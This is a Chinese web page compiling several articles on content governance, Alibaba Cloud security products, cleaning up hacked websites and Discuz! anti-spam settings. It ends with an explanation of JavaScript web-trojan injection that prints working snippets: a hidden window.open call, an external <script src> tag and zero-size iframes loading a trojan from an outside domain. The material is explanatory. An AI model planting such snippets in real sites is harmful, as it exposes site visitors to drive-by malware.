
2019年01月03日 14:00:00 来源: 中国网信网 近日,针对网络生态问题频发、各类有害信息屡禁不止等突出问题,为积极回应民众关切,国家网信办启动网络生态治理专项行动。 据悉,此次专项行动于2019年1月正式启动,将持续开展6个月,分为启动部署、全面整治、督导检查、总结评估四个阶段,对各类网站、移动客户端、论坛贴吧、即时通信工具、直播平台等重点环节中的淫秽色情、低俗庸俗、暴力血腥、恐怖惊悚、赌博诈骗、网络谣言、封建迷信、谩骂恶搞、威胁恐吓、标题党、仇恨煽动、传播不良生活方式和不良流行文化等12类负面有害信息进行整治,集中解决网络生态重点环节突出问题,充分运用现有行政执法手段,严厉查处关闭一批违法违规网站和账号,有效遏制有害信息反弹、反复势头,促进网络生态空间更加清朗。 国家网信办有关负责人强调,此次专项行动要严格按照“谁主管谁负责,谁主办谁负责”原则,狠抓责任落实,各地网信部门要切实履行属地管理责任,各网站平台要坚决落实企业主体责任,全力推动网络生态专项治理工作取得实效。对纵容违法违规行为、社会影响恶劣的相关责任人,绝不姑息纵容,将依法依规予以严肃处理。 阿里云云盾内容安全提供全面内容安全管控解决方案: 图片鉴黄识别服务:https://ai.aliyun.com/lvwang/imgadult?spm=5176.12188849.artificialIntelligence.33.69a73cd0OHc4aZ 图片涉政暴恐识别服务:https://ai.aliyun.com/lvwang/imgterrorism?spm=5176.12188934.artificialIntelligence.34.6b0272b4wntD3D 图片垃圾广告识别服务:https://ai.aliyun.com/lvwang/imgad?spm=5176.12188220.artificialIntelligence.36.96513b0dhDSx8q 图片不良场景识别服务:https://ai.aliyun.com/lvwang/imglive?spm=5176.12188956.artificialIntelligence.37.1f2c1a9ePdWtzl 文本违法及反垃圾识别服务:https://ai.aliyun.com/lvwang/text?spm=5176.12189013.artificialIntelligence.40.6beb61044V50xP 语音违法及反垃圾识别服务:https://ai.aliyun.com/lvwang/audio?spm=5176.11963023.artificialIntelligence.41.463e33189PUEK4 详情也可联系云盾内容安全产品专家进行沟通咨询:
OSS图片鉴黄服务简介 内容安全通过人工智能技术鉴别色情图片,准确率高达99.6%以上,帮助您减少审核人力, 有效降低涉黄风险。 图片鉴黄服务快速开通及使用说明 图片鉴黄服务开通 定位到云盾管理控制台 > 内容安全,单击OSS图片鉴黄。 若您未开通OSS,请前往OSS控制台开通,开通OSS服务。 如果您已经是OSS用户,单击授权进行内容安全RAM授权。 单击同意授权,完成访问授权。 在OSS图片鉴黄页面,单击设置进行OSS Bucket的选择。 如果你需要对存量进行检测,点击右上角存量扫描。设置需要存量检测的bucket和时间周期即可。
在阿里云从零搭建一个防入侵体系 安全已经成为云计算技术体系中重要组成部分,如果上云后不考虑安全防护措施被入侵的可能性几乎是100%。阿里云提倡安全责任共担模型,阿里云负责云平台基础安全防护,用户负责虚拟化层以上的组件安全。本课程就是教会大家如何利用阿里云提供的各种安全产品在虚拟化层之上搭建一套基础的防入侵体系,包括网络安全、主机安全、应用安全和安全监控四个基础安全产品。 准备工作 安全组 安全组:安全组是阿里云提供的分布式虚拟化防火墙,具备状态检测包过滤功能。安全组是一个逻辑上的分组,这个分组是由同一个地域(Region)内具有相同安全保护需求并相互信任的实例组成。使用安全组可设置单台或多台云服务器的网络访问控制,它是重要的网络安全隔离手段,用于在云端划分网络安全域。 场景设计:新建安全组,通过不同策略验证SSH登录情况 实验步骤 1、新建安全组X,组内规则初始为空 2、创建VM A,指定所属安全组X,使用事先准备好的VM镜像 3、缺省状态下,验证从公网ssh连接VM失败 4、添加公网安全组规则允许公网ssh访问 5、验证公网ssh到VM成功 产品细节说明 1、业务限制 2、规则介绍 安骑士(专业版,半年) 安骑士:运行在服务器上的轻量级插件,通过与云端的大数据威胁情报库联动,提供服务器整体的高危风险检查、实时入侵告警、一键漏洞修复等功能; 基本架构 实验步骤 1、进入安骑士控制台并完成专业版的购买 点击进入 安骑士控制台,点击左侧导航栏中的“服务器列表”,为了方便演示,我们已经帮用户购买了1台ECS,并且在ECS上都部署了安骑士的agent,此时可以看到当前的安骑士处于“在线状态”。点击右上角“购买付费版”,选择专业版1个授权数,下单并完成付款(当前已经给账号发放了相应的代金券,不需要真实付款) 购买前: 购买后: 2、使用基线检查进行 “账户安全”检测 通过列表中的服务器IP前面的复选框,选住需要检测的服务器,并点击批量操作栏的“手动检测”,选择“系统账户安全检测”,并点击确定开始检测 开始后,看到显示“检测中,预计X分钟结束”,此时我们操作栏的“查看详情”,进入详情页面 稍等一会,检测结束,检测结果出来了,发现了4个异常,分别如下 密码强度位数不够、密码过期提醒时间未设置、密码强制过期时间太长、存在一个可疑的黑客账号 3、重复步骤2,分别完成“可疑进程检测”、“高危漏洞检测”、“可疑自启动项”检测 4、设置“周期检测”策略,自动化完成安全监控 进入安骑士控制台 - 设置 - 页面,选择,基线检查周期配置,点击“添加” 可自定义策略名称、时间、项目、对应的服务器,开启周期检测 保存设置,系统将会在指定的时间调度指定的检测项,有异常结果将会进行通知和告警 5、实验完毕。 您可以结合自身业务特征,尝试更多的检测项目,同时可以尝试我们其他的功能,木马查杀、登录安全、补丁管理等,欢迎随时与我们交流。 态势感知(企业版,一年) 态势感知:大数据安全分析平台,通过收集企业20种原始日志和网络空间威胁情报,利用机器学习还原已发生的攻击,并预测未发生的攻击; 基本架构 实验步骤 1、进入态势感知控制台并完成企业版的购买 点击进入 态势感知控制台,点击“升级”按钮进行升级,为了方便演示,我们已经帮用户态势感知企业版进行演示。 进入态势感知控制台,进行接下来的安全试验 2、使用“设置”功能,对云上的全部资产(ECS+RDS)进行告警配置,如邮件收件人配置,手机短信告警配置 进入导航,前往“设置”导航菜单,进行具体的告警配置,并可配置《每日安全日报》的邮件收件人 提供了紧急事件,攻击事件,漏洞事件,情报事件共4个大类型的告警,每个大类型又包含各种小类安全事件的告警配置 点击选择不同的告警事件,进行邮件和短信告警 4、进入“攻击”导航内,对攻击事件进行告警处理,以及查看攻击类型 进入态势感知控制台 - 威胁 - 攻击页面 态势感知提供了应用攻击,主机暴力破解攻击等功能,这里我们可以着重看下应用攻击 可查看攻击的类型,攻击方式,攻击应用等功能 5、实验完毕。 WAF(企业版,一个月) WAF:WAF采用反向代理的接入架构,通过修改防护域名的DNS解析到WAF而将流量牵引到WAF,通过各种防护模块过滤掉恶意流量后,再把正常请求转发回源站。防护架构如下: 配置接入WAF 登录阿里云控制台,找到云盾->Web应用防火墙->域名配置,输入相关的域名及源站信息,并点击“添加域名”按钮: 支持配置泛域名,如*.aliyundemo.cn,可以匹配相关的二级域名。当同时配置泛域名和精确域名时,转发和防护策略匹配顺序以精确域名优先如果有HTTPS站点,务必勾选HTTPS,同时建议勾选HTTP,以应对HTTP跳转等问题,同时需要在稍后上传源站证书和密钥(实验中我们只勾选HTTP)源站IP可以支持最多20个,WAF会做负载均衡和健康检查,详情见“源站IP负载均衡” 如WAF前面还有CDN、高防等七层代理,务必勾选“是否已使用代理”,这样才能取到客户端真实IP,不然看到的都是上一级代理的IP添加好域名后,会弹出选择解析方式的弹窗,为了更好的演示接入原理,这里选择手动修改: 配置好域名后,WAF会自动分配给当前域名一个CNAME,可点击域名信息来查看: 接下来我们登录万网控制台,找到对应域名的“域名解析”->“解析设置”,正常情况下会有已经存在的一些解析,如下图: 接下来需要将记录类型改成CNAME,记录值改成WAF控制台提供的CNAME,如下图: 开启日志检索 在刚配置好的域名->业务状态中,找到日志检索并打开: 配置并体验精准防护规则 精准访问控制规则允许用户基于HTTP头部的各个字段自由组合各种访问控制规则: 找到防护域名,点击“防护配置”,进入“精准访问控制规则”即可配置。您可以自由尝试各种条件,匹配的内容大小写不敏感,匹配按照从上到下的优先级。详细的配置方式请参考这里:https://help.aliyun.com/document_detail/42780.html 配置好后一般3分钟内即可生效,您可以手动构造一些请求来验证防护效果,如果匹配中拦截,预期访问会被WAF拦截并弹出405拦截页面: 同时,您也可以在日志检索中看一下拦截的具体请求,以及匹配中访问控制规则的情况:
(https://yq.aliyun.com/promotion/168)
2017年全国两会刚刚揭开帷幕,阿里云也正式推出中国政务云,面向党政部门和事业单位提供独立、安全、合规的行业政务云服务,还包含了政务网站护航、重大活动网络护航、政务直播、政务大数据舆情、攻防演练、等级保护安全合规等专业场景下的服务。 中国政务云是国内第一个高等级政务云服务。 中国政务云拥有六大优势:完善的安全防护、敏捷快速地满足业务需求、合乎政府相关要求、强大的大数据和中间件产品、开箱即用的技术平台、低成本高可靠的安全性。 中国政务云的正式上线有助于国家 “互联网+政务”的稳妥推进和“十三五”国家信息化规划的实施,为党政部门和事业单位提供专业技术支撑,优化政务服务、提高群众办事满意度。 哪些政府机构已经率先上云 目前,阿里云已经为云上贵州、国税总局、海关总署、国家知识产权局、人社部、海淀政务云、交通部、北京国税、浙江省交通厅、中国气象局、四川卫计委、人社考试中心、湖南司法等机构提供服务,并保障了G20峰会、第三届世界互联网大会等国际性会议的网络安全。 以北京国税为例,由阿里云与合作伙伴联合支持,仅用3个月的时间就推出电子税务局,覆盖了80%的办税服务需求。提高了纳税大厅工作人员的工作效率,也为纳税人提供了足不出户就可办理业务的便利。 如何保障政府数据上云安全 中国政务云在安全性上有突出优势。 据了解,为满足政务云高等级的要求,中国政务云采用独立机房集群,与公共云物理隔离,同时采取严格的准入机制、访问控制和安全容灾能力,并已通过云计算等级保护三级测评及党政部门云计算网络安全审查(增强级)。 目前阿里云正在实时保护全中国37%的网站,并为G20峰会和第三届世界互联网大会等国际会议提供了强大的网络护航支持。 G20峰会期间,阿里云为全国99个重保用户及浙江省217个政务业务系统提供安全防护,实现了峰会期间零业务中断与零安全事件; 第三届世界互联网大会期间,阿里云为互联网大会官网、注册系统、会务系统提供安全保障,实现了世界互联网大会业务系统安全运营,零干扰
如果你在负责公司的网站,网站租用的虚拟主机,最好往下看。 有没有收到过这类的电子邮件“大流量客户通报”,“耗资源客户通报”;或者网站被接入商关闭、网站后台无法登陆上传等等。今天特意整理出一篇关于《企业网站耗资源、大流量的根治方法》 (企业站挂马) 想彻底解决,就要知道原因;要了解原因,先要对网站出现的问题进行分析,如下: 1.网站被上传可疑文件。 2.数据库被注入,新闻和产品系统出现大量垃圾信息。 3.留言板被灌,出现大量垃圾留言。 4.会员系统被灌,出现大量垃圾会员。 5.评论系统入侵,出现大量垃圾评论。 6.网站首页、内页、甚至管理后台被挂了很多垃圾文字链接或者乱码字符。 7.后台无法登陆或者无法发布信息。 第一部分:耗资源 被上传可疑文件的原因和一般处理方法: 接入商(比如万网)会给出是哪些文件耗资源,出示证据(发邮件通知,或者直接给万网打电话问),用FTP直接删除那些耗资源的文件。还有,证据不会给出全部的耗资源文件,还有一些文件需要管理员自己找,网站中有的文件是网站必要文件,有的是可疑文件,这需要逐一排查。如果清理不干净,说不好什么时候残余可疑文件还会发生耗资源。 可疑文件是如何被传上去的? 渠道一: 小型(企业)网站的后台,很多采用的是网上流传的开源CMS(内容管理系统),比如织梦的DEDECMS,还有很多小型的CMS,数不胜数,一些建站公司自称自己的开发的CMS实际上也有很多是基于某一种CMS改进而来的。这些CMS由于开源和公开,它的漏洞也是公开的,黑客就是利用这些漏洞往网站主机里上传了这些可以文件。 渠道二:网站FTP密码泄露,比如公司更换网站负责人、网站公司更换技术、密码过于简单被破解等等,有了密码,黑客可以随意对网站进行操作。 渠道三:每个网站管理后台都有一个超级管理员(ADMIN),拥有管理网站的最高权限,如果此密码被泄露或者破解,黑客亦可以随意操作网站。 渠道四:一台服务器承载着成百上千个网站,如果有个网站被入侵或攻击,往服务器中上传病毒或木马,会波及到此服务器上其他网站。 以上办法是治标的办法,如何治本呢? 如果可疑文件清理不彻底,或者没有找到全部的病因,用不了多久还会收到“耗资源”、“大流量”的通知,因为你的网站被列入过黑客的“肉鸡”名单,他们会三天两头光顾和利用你的网站,这个时间长则1个月,短的3天左右。万网每个月一共给三次开通机会。如果一个网站被关闭三次,那只有等下个月再开通了。 造成网站的耗资源、大流量的原因是复杂的,应该寻找病因,逐一解决,方能根治。 渠道一的解决办法:如果网站使用开源CMS,近期不考虑更换CMS的话,先升级补丁,给网站升级到当前最新的CMS补丁,然后定期手动升级CMS补丁,开源CMS会不定期公布补丁,自动更新或者手工更新。 渠道二三的解决办法:每月更换一次FTP密码,网站超级管理员密码也要定期更换,密码最好在8位以上,同时要包括大写字母、小写字母和数字。网站管理员换人后立即更换密码。 渠道四的解决办法:这个比较难处理,不过我们可以做到定期备份网站,一旦网站出现大范围更改,可以用日期较近的备份文件来恢复。 第二部分:大流量 先说说什么是流量,网站所使用的虚拟主机,除了有网页空间大小区别之外,还有一个不经常被注意的参数,那就是“流量”,比如万网的M3主机,它拥有1GB的网页空间,每月流量上限30GB。每月流量超过这个限制,万网就会给你发通知了。那我们该如何理解这个流量呢? 比如,你网站中有一个视频,这个视频大小是30MB,那么被一个网民看一遍后,流量就会消耗30MB,如果1周内被1000人观看,那消耗的流量就是30G。通常一个网站首页包含HTML、图片、CSS,JS等文件,全部加在一起估计2-5MB左右,网民打开一次网站首页,浏览器会从你的网站虚拟主机上下载这么多文件,才能看到正常的首页。除了访问首页之外,他还会访问内页、产品图片、视频等信息,全部加在一起,一个网民一次访问你的网站会消耗10-20MB左右的流量。30GB的流量,估计一个月可以供1000-3000人次访问,平均每天100人访问。对于一般不做推广或者推广力度较低的小企业网站来说,30GB的流量是够用的。那为什么会超流量呢?原因如下: 1.网站中有MP3或者视频文件,这些文件被一些搜索引擎抓取到,在别人网站中播放音乐时,也会消耗你主机的流量,因为这些文件存储在你的虚拟主机上。 2.网站被灌了很多垃圾信息,还会造成数据库容量超标,让网站访问变慢、流量过大。 针对第一种情况的解决办法是,直接删除那些被收录的文件,显然这不是治本的办法,彻底的办法是先把音频文件改名,然后在robots.txt中加上一句,不让搜索引擎收录此链接。这样就没有后顾之忧了。 对于第二种现象,原因很多,比如,使用织梦DEDECMS的网站,会员系统、评论系统、留言系统如果没有任何防范措施,很容易被灌。方法如下: 1.禁止注册会员,在“系统基本参数,会员设置”中关掉会员注册。 2.禁止评论,在“系统基本参数,互动设置”中把评论关掉。 3.给留言板增加验证码。 4.批量删除垃圾会员信息(SQL语句)。 5.批量删除评论信息(SQL语句)。 6.批量删除留言内容(SQL语句)。 7.清理ftp中 cache member目录的垃圾缓存。 8.备份一下清理后的干净网站,以备后用。 第三部分:网站挂马 网站被挂马,是一件让解决者很头疼的事情。一般企业网站被挂马,现象如下: 首页被挂马,比如底部,顶部多了一行链接,内容多为枪支弹药,黄赌毒等 全站被挂马,每个页面同一部位或者不同部位均被挂马 除了网站前台,就连网站后台也被挂马,网站管理员登陆网站后,发现登陆界面乱码,管理界面被弄的面目全非 企业网站被挂马的原因: 要想彻底解决挂马,我们先看看挂马是怎么回事。所谓的挂马,就是黑客通过各种手段获得网站管理员账号,然后登陆网站后台,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当用户访问被加入恶意代码的页面时,就会自动的访问被转向的地址或者下载木马病毒。 企业网站被挂马的处理措施: 发现网站被挂马后,一般是两个解决办法:第一是找到根源,堵住根源,因为这条很难办,无法快速定位病原。大多数情况先从第二条措施做起,比如删除被挂马页面的恶意代码,先从首页改起。一个首页被挂比较容易处理,难处理的是整个网站的前后台都被挂,更难处理的是,恶意代码破坏了原有程序,造成不可逆修改。遇到这种起概况,就要恢复备份了。如果数据库也被大量挂马,数据库也要恢复原始状态。 根治的方法要从堵住漏洞做起,参考第一部分《耗资源》的处理方法。 企业网站被挂马的预防: 1.定期备份网站。 2.定期观察网站异常。 3.定期修改密码(FTP密码、网站管理员密码,服务器远程登录密码)。 4.定期给Windows服务器安装补丁。 总结一下,网站是一个企业的门面,即便他只有展示的作用。很多中小型企业网站是每人维护的,网站打不开了都没有人管,这是一件很可悲的事情啊。不好好利用、好好管理网站,当初为什么花钱做网站。 感谢achair-李建的投稿分享
看到此文后,我认为你应该试着通过此文的方法检测一下你的网站是否被黑,因为有可能你的网站被黑了,连你自己都不知道,从下面的图片可以明显的看得出,我的网站也曾被黑过,但这位大神并没有打算处理我的网站,所以只是在网站上传一个文件来提醒我的,或许大家的网站中也有类似的情况。 从网站被黑统计上来,每天被黑掉的网站有上万个,但能够知道自己网站被黑了,却没有几个。那么我们如果检测网站被黑和处理被黑呢? 网站黑链检测和处理方法 首先打开你的网站,点击浏览器右键【查看网站源代码】,不懂代码的朋友可能有点晕,略懂代码的朋友均能够清楚的看到自己的网站是否存在黑链接,不懂代码的朋友没关系,仔细看代码,你可以看到代码里面是否存在其他网站的链接(友情链接除外),如果存在其他网站的链接,并且不是自己有意加上的链接,那么说明这些链接是被黑客挂上去的。如下图所示: 通常遇到这样的情况,大多数黑客是通过后台、FTP更改的代码,所以最好的处理方法是删除这些黑链接,并且更改后台和FTP帐号密码。 网站被上传文件检测及处理方法 还有一部分网站,由于上时间未打理,被黑客上传关于非法的文件,像博彩行业基本都是通过这一类的方法去做SEO优化的,但是黑客刚刚上传的时候,可能上传的并不是根目录,连我们自己都察觉不出来,所以检测起来就非常苦难,别担心我这里有方法检测。 打开你网站的robots文件,查看robots文件中的允许被抓取的文件夹(Allow为允许抓取),通常情况下,我们的栏目是不需要在robots中允许被抓取,因为我们网站的首页有直接链接到栏目,而黑客不会在你网站首页挂一个这样的链接,那只有写在robots文件中,所以如果你的robots文件中出现了某一个允许被抓取的栏目,你应该试着打开那个栏目内容,是否是你自己制作的内容,或者页面中是否存在非法内容。如下图所示: 当然,也不一定非要写到robots里面去,可能会写到sitemap地图里面,但我们还可以通过site工具查询,查询收录的新页面都有哪些,是否存在垃圾页面或者其他页面。 网站快照被劫持检测和处理方法 在一个是我们的内容明显明显是SEO的,但是百度收录的却是其他内容,这说明了你的百度快照被劫持了,黑客主要是掌握了百度、360等搜索引擎的IP,然后根据不同IP访问不同的页面,所以导致了自己的快照被劫持。 查询的方法很简单,打开搜索引擎site你的网站,从标题、描述等基本信息可以看到是否与网站符合,同时也可以点击【百度快照】按钮,看一下,网站被百度抓取的内容,是否与自己的内容符合。 那么出现这一种情况如何解决呢,最快速的办法就是打开自己快照被劫持的页面,查看源代码,然后找到快照劫持的JS(通常情况下都是以JS的形式劫持),实在看不懂的话,没关系,那就使用【网站被黑检测】工具,检测后,对比一下前后的差距,如下图所示: 当然,还有黑客做的更离谱,拿下你的额FTP后,他们会在凌晨1-5点左右更换你网站的内容,修改你网站的title和mate等标签,等到搜索引擎抓取以后,在把title和mate等标签修改回来,然后你的快照被劫持了,但是代码却没有任何问题。如果你在代码上实在找不到原因,唯一的解决办法就是改后台帐号密码和FTP帐号密码了。 小结:常规的网站被黑就是以上的几个事情,还有部分网站被黑直接被毁掉,很少有这种情况出现的,可能是遇到新手黑客练手玩玩,对于这种线下,我们得做好以下几个对策。 备份 以前我是每天备份一次,在后来每周备份一次,在后来就是半年看一次,现在都忘记了多久没备份了,我建议数据库每天备份一次,文件每周备份一次,如果你嫌麻烦,可以试着使用网站自动备份工具。这里给大家介绍多备份工具! 第一步:打开【多备份工具】,注册登录,可直接使用QQ登录,方便,也不需要记住帐号密码啥的。 第二步:点击右上角【添加】的按钮,根据你的条件选择文件备份或数据库备份,两个都需要备份的,这里一个一个来,如下图所示: 第三步:填写对于的资料,这里大部分做博客或企业网站的用的都是FTP,所以可以直接选择FTP【虚拟主机】,填写FTP地址、帐号密码然后点击链接。 第四步:根据你拥有的网盘然后设置备份路径,比如你绑定了百度网盘,那么可以直接把文件备份到百度网盘里面去,如果你没有绑定,没关系,他们官方提供网盘使用。另外一个就是设置备份平率,个人建议,数据库每天备份一次,文件每周备份一次,当然主要还是根据你网站的更新平率来的。然后点击【启动备份】即可。 第五步:等待备份完毕后,打开你的百度网盘中的【我的应用数据库】-【backupcloud】里面会多出一个文件,说明你备份成功了,这个文件就是备份文件,另外数据库备份设置方法和文件备份设置方法一样。 安全插件 安全插件很多大公司都在做,比如360、百度、腾讯等,不过都大同小异,如果是考虑到百度SEO优化,那么建议使用百度的插件,百度的安全插件主要结合在百度云加速上,虽然百度云加速有点吭,但是考虑SEO优化,不得不从了他。 第一步:打开【百度云加速】网站,注册登录,这里可以直接使用百度帐号登录。 第二步:点击右上角【我的网站】,然后点击【添加】的按钮,输入你的域名点击【下一步】。 第三步:进入你的域名解析页面,对比你的域名解析与百度云加速检测到的解析是否正确,当正确的情况下点击下一步,如果少了某一个解析,这里可以直接点击左上角【添加子域名】。如下图所示: 第四步:进入域名管理页面,找到修改DNS的地方,修改成百度给出的DNS,然后点击【设置完成】,如下图所示: 完成了百度云加速的设置后,可以直接从百度云加速中看出一天网站的流量,被拦截的次数,被攻击的次数,是什么类型攻击的,另外百度云加速还可以查询到搜索引擎什么时候抓取了你网站什么页面和其他SEO方面的设置。 网站被黑有那些影响? 在早几年,我们经常可以看到,黑客把人家网站黑了,留下一句话,打款多少钱,恢复其网站,不过现在这种情况少见了,虽然黑客不直接找你要钱,但并非没有影响。 网站降权:网站降权是最重要的一个影响,因为大多数网站都有数据库和文件备份,所以不可能被黑客全部毁掉网站,所以最严重的应该是网站权重下降的问题。 网站信誉下降:如果是一个商场网站,出现了被黑,打开后又有商城,又有赌博啥的,客户自然不敢购买你的产品了,知道的人以为你网站被黑了,不知道的人还以为商城兼职在做赌博。 风险提示:最后一个就是安全联盟的风险提示,搜索某一个词,在搜索引擎的结果页面中显示风险网站,打开的时候,还会提醒这是一个风险网站,自然很难让客户相信你这个站点。如下图所示: 总结:最后总结一下,其实很多人很少去关注这一块,当你发现网站被黑以后,搜索引擎也发现了,网站也就降权了,个人觉得,每天花10分钟去做网站被黑检测,是完全有必要的。
今天论坛有很多广告信息。每个版块都有几百条信息。手动发不可能。一定是用程序发的。无法通过程序判断是否灌水,只能通过设置发帖间隔时间、发帖最少字数及发帖验证码来减少。例如后台数据库已经存有关键字{三*陪*小*姐},如果用户在中间加入其它符号,也过滤不了。 Discuz!技巧:如何防止用户论坛恶意灌水 1:问:如果有注册机器人在Discuz!论坛上批量注册用户怎么办? 答:以管理员身份登入Discuz!后台,依次 “Discuz! 选项 -->安全控制--> 启用验证码”。将“新用户注册”选项前打勾,可有效防止注册机批量注册。 另外还可以设置注册限制:“Discuz! 选项-->注册与访问控制-->IP 注册间隔限制(小时) ”在这里设置同一台电脑注册时间的间隔也可有效防止恶意注册。 2:问:论坛如何防止论坛恶意批量发帖? 答:以管理员身份登入Discuz!后台,在后台设置防止灌水时间:“Discuz! 选项-->安全控制-->发帖灌水预防”,在这里设置两个帖子发表的时间间隔。 3:问:如何禁止论坛发表带有敏感字符的帖子? 答:以管理员身份登入Discuz!后台设置方法:依次进入后台 - 帖子相关 - 词语过滤 在 不良词语 输入框中填写要过滤的字符。在 替换为 输入框中填写改铭感字符过滤后的替换字符,如 需要过滤 “他*妈的”为“TMD”则在 不良词语 输入框中填写 “他*妈的”,在 替换为 输入框中填写“TMD”即可。有没有办法让含有某个字符的帖子无法发表呢?可以的。只要在上面选项中的 替换为 输入框中填写 “{BANNED}”,则将该铭感字符设置为不可发表。 4:问:如果发广告者在论坛各处发帖,管理员想一次性删除可以吗? 答:当然可以。以管理员身份登Discuz!后台,选择“论坛维护-->批量删帖”,在“发帖用户名”一项中填写恶意发帖者ID,点击提交后出现该ID所发表的所有文章,全部打勾或有选择性的批量删除即可。 5、osc上怎么处理的? 站长手册 适用版本: Discuz! X2.5 功能模块: 论坛 » 帖子 前后台: 后台管理 » 全局 » 防灌水设置 广告灌水现象在目前各种站点当中都有愈演愈烈的趋势,一方面会严重影响站点内容定位,剔除广告灌水内容又会增加运营成本;另一方面,广告灌水中经常会出现一些和法律法规相抵触的违禁内容,一旦处理不及时会给站点主办方造成负面影响,甚至于网站关闭的严重影响。所以广告灌水和与之相关内容监管一直受到网站主办方的严重关注。 一、防灌水基本设置 Discuz! X2.5中的防灌水设置,从两次发表时间间隔设置来限制广告灌水特征用户的快速“屠版”,此项设置是适合给整站所有级别用户的设置,如果时间设置合理对正常用户的影响较小。 默认两次发表时间间隔为 15 秒,可以根据自己站点的实际情况进行修改。 强制新用户验证激活邮箱:选择是的话,用户必须验证激活自己的邮箱后,才可以进行发布操作。 强制新用户上传头像:选择是的话,用户必须设置自己的头像后才能进行发布操作。 强制新用户好友个数:设置用户必须拥有多少个好友后,才可以进行发布操作。 上面的设置也都是系统可以自动完成判断的防灌水功能,虽然会对用户体验产生影响,但又因为仅对新注册和初级用户产生影响,所以还是可以视发展运营阶段灵活运用。 二、验证码设置 验证码一般是中文,英文的静态或者动态图片,是一种混合了数字或符号的代码,人可以通过抽象思维辨识,而机器抽象识别起比较困难,一般是防止有人利用机器自动批量注册、暴力破解方式进行不断的登陆、灌水的一种技术措施。Discuz!系列程序一直对验证码都在不断的优化和升级,以应对道高一尺魔高一丈的局面。 1)启用验证码 分别包括新用户注册、用户登录、发表信息、以及修改密码时开启验证码。我们在实际运营时推荐仅在新用户注册和发帖回帖时填写注册码,好处是对老用户影响最小,对用户体验的影响也在最小和最精准的新用户范围内。 2)验证码发帖限制 为了区分新老用户,就需要在“验证码发帖限制”设置最少发帖数,一般以个位数比较合适。 3)验证码类型 包括中/英文图片验证码、Flash 验证码、语音验证码和位图验证码。 中文图片验证码需要你的主机支持 FreeType 库。需要手动上传字库文件至 static/image/seccode/font/ch/ 目录下,站点将随机使用里面的字体文件作为验证码的文字。 要显示 Flash 验证码,建议你的主机支持 Ming 库以提高安全性。 开启语音验证码需要输入你听到的字符进行验证。 开启中/英文图片验证码和Flash 验证码时选择填写验证码图片宽度、验证码图片高度等项目,具体如下: 4)验证码图片宽度 验证码图片的宽度,范围在 100~200 之间。 5)验证码图片高度 验证码图片的高度,范围在 50~80 之间。 6)图片打散 打散生成的验证码图片,输入打散的级别,0 为不打散。 7)随机图片背景 选择“是”将随机使用 static/image/seccode/background/ 目录下的 JPG 图片作为验证码的背景图片,选择“否”将使用随机的背景色。 使用图片作为验证码的背景,把制作好的 JPG 图片上传到 static/image/seccode/background/ 目录下,站点将随机使用里面的图片作为验证码的背景。 8)随机背景图形 选择“是”将给验证码背景增加随机的图形。 9)随机 TTF 字体 选择“是”将随机使用 static/image/seccode/font/en/ 目录下的 TTF 字体文件生成验证码文字,选择“否”将随机使用 static/image/seccode/gif/ 目录中的 GIF 图片生成验证码文字。中文图片验证码将随机使用 static/image/seccode/font/ch/ 目录下的 TTF 字体文件,无需进行此设置。 使用 TTF 字体作为验证码文字,把下载的 TTF 英文字体文件上传到 static/image/seccode/font/en/ 目录下,站点将随机使用里面的字体文件作为验证码的文字。 10)随机倾斜度 选择“是”将给验证码文字增加随机的倾斜度,本设置只针对 TTF 字体的验证码。 11)随机扭曲 选择“是”将给验证码文字增加随机的扭曲,本设置只针对 TTF 字体的验证码。 12)随机颜色 选择“是”将给验证码的背景图形和文字增加随机的颜色。 13)随机大小 选择“是”验证码文字的大小随机显示。 14)文字阴影 选择“是”将给验证码文字增加阴影。 15)GIF 动画 选择“是”验证码将显示成 GIF 动画方式,选择“否”验证码将显示成静态图片方式。 在验证码类型的选择上,由于广告灌水程序技术也在不断升级,所以验证码的设置上也要尽量选择电脑尚不容易辨识的“GIF动画”,“随机扭曲”等设置。 也可以自己制作图片做为验证码文字,图片必须包含字符“2346789BCEFGHJKMPQRTVWXY”24 个字符,且必须为 GIF 透明图片、背景透明、前景黑色,黑色为图片的第一个索引色。图片大小不限制,但建议宽度不大于验证码宽度的 1/4,高度不大于验证码高度。制作完毕后在 static/image/seccode/gif/ 下创建一个新的子目录,目录名任意,把制作完毕的 24 个 GIF 图片上传到新子目录下。 三、验证问答设置 验证问答和验证码比较类似,随机产生,而且需要思考解答,能够对利用灌水程序造成一些麻烦。验证问题应该言简意赅,没有歧义,正常人都能够正确作答。 验证问题及答案设置: 这里可以使用默认的100 以内加减法,也可以增加新问题,建议你经常更换新增加的问题以防止被猜测。 四、注册表单名称设置 在注册表单名称设置方面,通过个性化注册表单名称的设置,也让灌水程序不能肆意妄为。 1)用户名表单设置 默认为 username ,只能是字母和数字的组合,必须以字母开头。修改后的表单名会使得注册机更难发挥作用。 2)密码表单设置 默认为 password ,只能是字母和数字的组合,必须以字母开头。 修改后的表单名会使得注册机更难发挥作用。 3)重复密码表单设置 默认为 password2 ,只能是字母和数字的组合,必须以字母开头。 修改后的表单名会使得注册机更难发挥作用。 4)Email表单设置 默认为 email ,只能是字母和数字的组合,必须以字母开头。 修改后的表单名会使得注册机更难发挥作用。 五、发帖时间段设置 发帖时间段的设置包括禁止发帖和发帖审核的时间段设置,在每日的深夜至凌晨阶段设置禁止发帖或发帖审核,可以有效地控制站内的垃圾信息泛滥,有调查表明,发帖机多在此时段进行广告帖轰炸。 对于地方站点来说,如果希望本地会员发帖不受时间段的设置限制,可以在不受时间限制的地区列表和不受时间限制的IP列表中,填写好当地的地名和IP段即可。
一、常见JS挂马方法 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。 这种方法使用的关键代码如下: window.open("http://www.mahaixiang.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。 另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write('<Iframe src="网页木马地址" ></iframe>')”,写入Windows中的写字板另存为后缀为.js的脚本文件,并上传到自己指定的网址。这时黑客只需要在受害者 的网站中写入: <script src="http://www.mahaixiang.cn/木马脚本.js"></script> 或者 document.write("<div style='display:none'>") document.write("<iframe src="网页木马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>") document.write("</div>") 就成功地将木马挂到了对方的网页中了。 